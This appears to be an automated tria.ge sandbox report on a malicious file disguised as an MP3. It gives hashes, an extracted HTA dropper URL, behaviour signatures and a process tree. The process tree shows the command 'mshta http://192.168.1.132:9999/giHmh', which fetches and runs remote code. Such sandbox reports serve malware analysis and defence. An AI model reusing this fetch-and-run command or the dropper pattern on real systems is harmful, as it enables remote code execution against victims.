Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

She Say Sh...Me.mp3

windows10-1703-x64

10

She Say Sh...Me.mp3

windows7-x64

10

She Say Sh...Me.mp3

windows10-2004-x64

6

Analysis

  • max time kernel
    844s
  • max time network
    846s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    19/08/2024, 05:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    She Say She Love Me.mp3

  • Size

    4.2MB

  • MD5

    37ab6a75bf6f5e9fe44fd7b304d6ebea

  • SHA1

    9e54b60d5926264866b726a1481423b1429a1b85

  • SHA256

    d2ab58a8be0005c2d8ee7290631c71b860e52b66efd5a27596374f12821e98cc

  • SHA512

    b04067b2fe5de3e9e48fdc9bcad067d8260e6c45e2b53b3630c2d663fc460ba7e82b1d900aa2b6fb28e5472685031a01d173c01e51c01158dad15a83d5af44b6

  • SSDEEP

    98304:vXRuJZshZJqw8Td0AvxxonMun4Dyai2qbN:vhuAh2bTbcnZn4DKN

Score
10/10
discovery

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://192.168.1.132:9999/giHmh

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 27 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 45 IoCs
  • Suspicious use of SendNotifyMessage 42 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Program Files\VideoLAN\VLC\vlc.exe
    "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\She Say She Love Me.mp3"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:2672
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:275457 /prefetch:2
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1496
  • C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\system32\mshta.exe
      mshta http://192.168.1.132:9999/giHmh
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      PID:2972
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2672-6-0x000007FEF6D60000-0x000007FEF6D94000-memory.dmp

    Filesize

    208KB

    Download

  • memory/2672-5-0x000000013F480000-0x000000013F578000-memory.dmp

    Filesize

    992KB

    Download

  • memory/2672-8-0x000007FEFBD30000-0x000007FEFBD48000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2672-9-0x000007FEF77F0000-0x000007FEF7807000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2672-10-0x000007FEF71D0000-0x000007FEF71E1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-14-0x000007FEF66F0000-0x000007FEF6701000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-7-0x000007FEF5FE0000-0x000007FEF6296000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2672-13-0x000007FEF6750000-0x000007FEF676D000-memory.dmp

    Filesize

    116KB

    Download

  • memory/2672-12-0x000007FEF6BF0000-0x000007FEF6C01000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-11-0x000007FEF6C10000-0x000007FEF6C27000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2672-16-0x000007FEF4D20000-0x000007FEF4F2B000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2672-17-0x000007FEF6550000-0x000007FEF6591000-memory.dmp

    Filesize

    260KB

    Download

  • memory/2672-18-0x000007FEF66C0000-0x000007FEF66E1000-memory.dmp

    Filesize

    132KB

    Download

  • memory/2672-19-0x000007FEF6530000-0x000007FEF6548000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2672-20-0x000007FEF64A0000-0x000007FEF64B1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-21-0x000007FEF6480000-0x000007FEF6491000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-22-0x000007FEF6460000-0x000007FEF6471000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-23-0x000007FEF6440000-0x000007FEF645B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2672-24-0x000007FEF6420000-0x000007FEF6431000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-25-0x000007FEF6400000-0x000007FEF6418000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2672-26-0x000007FEF63D0000-0x000007FEF6400000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2672-27-0x000007FEF4CB0000-0x000007FEF4D17000-memory.dmp

    Filesize

    412KB

    Download

  • memory/2672-29-0x000007FEF63B0000-0x000007FEF63C1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-28-0x000007FEF4C30000-0x000007FEF4CAC000-memory.dmp

    Filesize

    496KB

    Download

  • memory/2672-36-0x000007FEF4A50000-0x000007FEF4B15000-memory.dmp

    Filesize

    788KB

    Download

  • memory/2672-40-0x000007FEF2B80000-0x000007FEF2B92000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2672-15-0x000007FEF4F30000-0x000007FEF5FE0000-memory.dmp

    Filesize

    16.7MB

    Download

  • memory/2672-39-0x000007FEF2BA0000-0x000007FEF2BB1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-38-0x000007FEF2DA0000-0x000007FEF2DC8000-memory.dmp

    Filesize

    160KB

    Download

  • memory/2672-37-0x000007FEF2DD0000-0x000007FEF2E27000-memory.dmp

    Filesize

    348KB

    Download

  • memory/2672-35-0x000007FEF4B20000-0x000007FEF4B31000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-34-0x000007FEF4B40000-0x000007FEF4B53000-memory.dmp

    Filesize

    76KB

    Download

  • memory/2672-33-0x000007FEF4B60000-0x000007FEF4B8F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/2672-32-0x000007FEF4B90000-0x000007FEF4BE7000-memory.dmp

    Filesize

    348KB

    Download

  • memory/2672-31-0x000007FEF4BF0000-0x000007FEF4C01000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2672-30-0x000007FEF4C10000-0x000007FEF4C28000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2672-41-0x000007FEF2A00000-0x000007FEF2B7A000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-174-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

    Download

  • memory/2904-175-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

    Download